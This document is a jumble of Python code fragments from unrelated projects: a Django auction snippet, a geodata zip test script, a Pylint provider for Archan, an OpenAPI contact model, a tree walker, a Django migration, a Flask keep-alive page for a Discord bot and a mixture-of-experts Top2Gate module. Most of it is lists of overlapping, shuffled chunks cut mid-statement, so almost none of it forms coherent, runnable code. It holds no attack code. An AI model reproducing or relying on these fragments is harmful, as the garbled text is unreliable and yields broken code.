        if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION:
            auction.bids = []
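The `demand`/`act` split means the class itself is the match result: `demand` inspects the incoming patch and returns the class when the patch is this action's trigger, and the caller then instantiates and runs it. A minimal hypothetical driver loop is sketched below; the `actions` registry and the `(request, context)` constructor signature are assumptions for illustration, not part of this module.

def run_matching_action(request, context, actions):
    # `actions` is a hypothetical iterable of BaseAction subclasses, e.g.
    # [CancellationActivationAction, ...]; the first class whose demand()
    # accepts the patch is instantiated and applied.
    for action_class in actions:
        if action_class.demand(request, context):
            action_class(request, context).act()  # assumed BaseAction signature
            break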
[
"sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\")",
"from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT",
"workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e:",
"import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname =",
"geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt =",
"import os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv",
"_EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv",
"\".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path",
"zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt)",
"os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname",
"import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def",
"validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles()",
"sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try:",
"txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__ == '__main__': main()",
"import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\",",
"z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if",
"\".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed():",
"= os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\",",
"'..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list =",
"= geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception:",
"= os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path)",
"[\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path)",
"Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__ ==",
"= _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\")",
"os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list",
"try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path",
"= validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list)",
"e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__ == '__main__':",
"\".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path",
"= [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv =",
"dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\",",
"main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"]",
"\".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path =",
"pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT =",
"#!/usr/bin/python import os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import",
"<reponame>BerkeleyLibrary/geodata_pre_ingest<filename>tool_test/test_v_output4_8_get_map_zip_data.py #!/usr/bin/python import os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion",
"shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main():",
"zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\",",
"geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0}",
"projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code",
"valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data =",
"geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path =",
"\".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if",
"z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0} ;",
"= zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e))",
"except Exception, e: txt = \"Code exception: {0} ; {1}\".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__",
"def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\", \".shp\",",
"if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except",
"process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path =",
"valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception,",
"os.path.dirname(__file__).replace(\"test\",\"test_data\") def main(): try: geo_ext_list = _EXT = [\".cpg\", \".dbf\", \".prj\", \".sbn\", \".sbx\",",
"\".shp\", \".shx\"] process_path = os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path)",
"os.path.join(dirname,\"vector_data\",\"vector_output\") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data",
"= geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,\"map.zip\",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt"
] |
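Note that the `except Exception, e:` clause pins this script to Python 2. A minimal sketch of the same error reporting under Python 3 syntax (`run_zip_step` is a placeholder for the body shown above; the `geo_helper` API is assumed unchanged):

def main():
    try:
        run_zip_step()  # placeholder for the zip/validate body above
    except Exception as e:  # Python 3 spelling of the clause
        txt = "Code exception: {0} ; {1}".format(__file__, str(e))
        geo_helper.GeoHelper.arcgis_message(txt)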
# archan_pylint provider module
import sys

try:
    from archan import Provider, Argument, DomainMappingMatrix, Logger
    from pylint.lint import Run

    class LoggerWriter:
        """File-like object that forwards writes to a logging callable."""

        def __init__(self, level):
            self.level = level

        def write(self, message):
            if message != '\n':
                self.level('from pylint: ' + message)

    class PylintProvider(Provider):
        """Pylint provider for Archan."""

        identifier = 'archan_pylint.PylintProvider'
        name = 'Pylint Provider: Issues per Module'
        description = 'Number of Pylint messages per module.'
        argument_list = (
            Argument('pylint_args', list, 'Pylint arguments as a list.'),
        )

        def get_data(self, pylint_args=None):
            """
            Provide matrix data for Pylint messages in a set of packages.

            Args:
                pylint_args (list): the arguments to pass to Pylint.
                depth (int): the depth of the matrix to generate.

            Returns:
                archan.DSM: instance of archan DSM.
            """
            logger = Logger.get_logger(__name__)
            pylint_args = pylint_args or []
            # Capture Pylint's console output and forward it to the logger.
            sys.stdout = LoggerWriter(logger.debug)
            sys.stderr = LoggerWriter(logger.warning)
            try:
                run = Run(pylint_args, do_exit=False)
            except TypeError:
                # Older Pylint versions take `exit` instead of `do_exit`.
                run = Run(pylint_args, exit=False)
            sys.stdout = sys.__stdout__
            sys.stderr = sys.__stderr__
            entities = []
            data = []
            for k, v in run.linter.stats['by_module'].items():
                entities.append(k)
                data.append([sum(v.values())])
            entities.append('Messages')
            return DomainMappingMatrix(data=data, entities=entities)

except ImportError:
    class PyLintProvider:
        """Empty provider, please install Archan and Pylint."""
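A minimal usage sketch, assuming archan and pylint are installed; 'my_package' is a placeholder for a package on the current path, and the attribute access on the result assumes DomainMappingMatrix keeps its constructor arguments:

provider = PylintProvider()
matrix = provider.get_data(pylint_args=['my_package'])  # 'my_package' is a placeholder
# One [message_count] row per module, plus the trailing 'Messages' entity.
print(matrix.entities)
print(matrix.data)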
"""OpenAPI core contacts models module"""


class Contact(object):

    def __init__(self, name=None, url=None, email=None, extensions=None):
        self.name = name
        self.url = url
        self.email = email
        self.extensions = extensions and dict(extensions) or {}
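The `extensions and dict(extensions) or {}` expression is the pre-ternary idiom for `dict(extensions) if extensions else {}`: a falsy `extensions` yields a fresh empty dict, and a truthy one is copied. A short usage sketch:

contact = Contact(name="API Support", url="https://example.com",
                  email="support@example.com")
assert contact.extensions == {}  # no extensions supplied

contact = Contact(extensions={"x-twitter": "@example"})
assert contact.extensions == {"x-twitter": "@example"}  # copied into a new dict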
# Copyright (C) 2019 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause

import logging
import collections

log = logging.getLogger('codebasin')


class TreeWalker():
    """
    Generic tree walker class.
    """

    def __init__(self, _tree, _node_associations):
        self.tree = _tree
        self._node_associations = _node_associations
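Only the constructor is shown above; concrete walkers presumably subclass TreeWalker and supply their own traversal. A hypothetical sketch (the `walk` method and the `children` attribute are assumptions, not part of the base class):

class NodeCounter(TreeWalker):
    """Hypothetical walker that counts nodes reachable from the root."""

    def walk(self):
        count = 0
        stack = [self.tree]
        while stack:
            node = stack.pop()
            count += 1
            stack.extend(getattr(node, 'children', []))  # assumes children live in .children
        return count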
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-09 14:58
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('daiquiri_files', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='directory',
            name='depth',
            field=models.IntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='directory',
            name='path',
            field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'),
        ),
    ]
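For context, a sketch of the Directory model fields implied by these operations; only the two touched fields are recoverable from the migration, the rest of the model is not shown:

from django.db import models

class Directory(models.Model):
    # Added by this migration; existing rows are backfilled with 0.
    depth = models.IntegerField(default=0)
    # Altered by this migration.
    path = models.CharField(blank=True, help_text='Path of the directory.',
                            max_length=256, verbose_name='Path')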
# Linerly/linerlybot-rewritten
from threading import Thread

from flask import Flask

app = Flask("")


@app.route("/")
def home():
    return """
<!DOCTYPE html>
<html>
<head>
  <link rel="icon" href="https://linerly.github.io/assets/linerlybot/linerlybot.png" type="image/png">
  <title>LinerlyBot Repl Page</title>
</head>
<body style="width: 80%; margin: auto;">
  <style>
    figure message {
      top: 0;
      left: 0;
      position: absolute;
    }
  </style>
  <style>
    #message {
      margin: 0;
      padding: 12px 15px;
      background-color: #1e90ff;
      color: #fff;
      text-align: center;
      font-family: sans-serif;
      font-size: 13px;
    }
  </style>
  <p id="message">You're in LinerlyBot's Replit site. <a href="https://linerly.github.io/linerlybot">Click here to go to LinerlyBot's main page!</a></p>
  <br>
  <img alt="LinerlyBot logo" src="https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png" style="display: block; margin-left: auto; margin-right: auto; border-radius: 50%;" width="128" height="128">
  <h2 align="center">linerlybot-rewritten</h2>
  <p align="center">
    <a href="https://discord.gg/a9Sy7gE"><img alt="Discord Server" src="https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat"></a>
    <a href="https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE"><img alt="License" src="https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat"></a>
    <a href="https://github.com/psf/black"><img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg?style=flat"></a>
    <a href="https://pycqa.github.io/isort/"><img alt="Imports: isort" src="https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336"></a>
  </p>
  <hr>
  <p>The new version of LinerlyBot with <a href="https://discordpy.readthedocs.io/en/stable">discord.py</a>.</p>
  <p><a href="https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands"><img src="https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge" alt="Invite LinerlyBot"></a></p>
  <hr>
  <h1>Features</h1>
  <ul>
    <li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li>
    <li>Fun commands such as the <code>joke</code> and the <code>feeling</code> command.</li>
    <li>Other miscellaneous commands such as the <code>quote</code> command.</li>
    <li>Gold as the currency for LinerlyBot.</li>
  </ul>
  <hr>
</body>
</html>
"""


def run():
    app.run(host="0.0.0.0", port=8080)


def keep_alive():
    # Serve the page on a background thread so the bot can keep running.
    t = Thread(target=run)
    t.start()
"<h1>Features</h1> <ul> <li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code>",
"src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p>",
"page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right: auto; border-radius:",
"border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a>",
"import Thread from flask import Flask app = Flask(\"\") @app.route(\"/\") def home(): return",
"version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1>",
"auto; margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img",
"<a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such",
"currency for LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\", port=8080) def"
] |
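A minimal sketch of how this keep-alive server is typically wired into the bot's entry point. The bot object, the command prefix, the TOKEN environment variable, and the keep_alive module name are illustrative assumptions, not taken from the recovered code:

import os

import discord
from discord.ext import commands

from keep_alive import keep_alive  # hypothetical module name for the script above

bot = commands.Bot(command_prefix="!", intents=discord.Intents.default())

keep_alive()                  # start the Flask server in a background thread first
bot.run(os.environ["TOKEN"])  # then block on the Discord gateway connection

The ordering matters: keep_alive() returns immediately because the server runs in its own thread, while bot.run() blocks for the lifetime of the process.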
[
"locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 #",
"super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor,",
"+ gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s",
"# This source code is licensed under the BSD license found in the",
"location by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) #",
"gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc =",
"# gates has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] #",
"torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux,",
"source code is licensed under the BSD license found in the # LICENSE",
"= torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s",
"torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type:",
"has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity =",
"in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from",
"gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero =",
"torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s",
"int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor)",
"= 2S/E capacity = 2 * num_tokens // num_experts assert num_tokens % num_experts",
"file in the root directory of this source tree. # Implementation of Top2Gating",
"reserved. # # This source code is licensed under the BSD license found",
"size of model embedding dimension num_experts (ints): number of experts in model \"\"\"",
"torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def",
"shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E",
"dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations",
"Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int):",
"dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float =",
"// num_experts assert num_tokens % num_experts == 0 # Create a mask for",
"BSD license found in the # LICENSE file in the root directory of",
"capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) -",
"buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1",
"import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device:",
"expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create",
"Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from",
"(ints): number of experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int,",
"-> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) #",
"gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel",
"implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights,",
"gates = F.softmax(logits, dim=1) # gates has shape of SE num_tokens = gates.shape[0]",
"the # LICENSE file in the root directory of this source tree. #",
"bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits",
"num_tokens // num_experts assert num_tokens % num_experts == 0 # Create a mask",
"mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s =",
"of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo:",
"mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s =",
"https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing",
"gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask",
"capacity = 2 * num_tokens // num_experts assert num_tokens % num_experts == 0",
"1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) #",
"https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value",
"in the # LICENSE file in the root directory of this source tree.",
"/= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2",
"mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid",
"a mask for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise",
"of experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,)",
"torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s =",
"Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero",
"is licensed under the BSD license found in the # LICENSE file in",
"2S/E capacity = 2 * num_tokens // num_experts assert num_tokens % num_experts ==",
"F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) -",
"Args: model_dim (int): size of model embedding dimension num_experts (ints): number of experts",
"from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the",
"number of experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts:",
"input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits = self.wg(input) return",
"the capacity location for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s",
"combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which",
"Dict, Tuple import torch from torch import Tensor import torch.nn.functional as F gumbel_map:",
"# Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\",",
"gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s,",
"dim=0) - 1 # Update 2nd's location by accounting for locations of 1st",
"def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts,",
"# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. # #",
"combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model",
"torch.mean(me * ce) # Remove locations outside capacity from mask mask1 *= torch.lt(locations1,",
"Facebook, Inc. and its affiliates. All rights reserved. # # This source code",
"experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) ->",
"= F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc)",
"dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements",
"min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s,",
"Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2,",
"gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /=",
"int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self,",
"in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0)",
"num_tokens % num_experts == 0 # Create a mask for 1st's expert per",
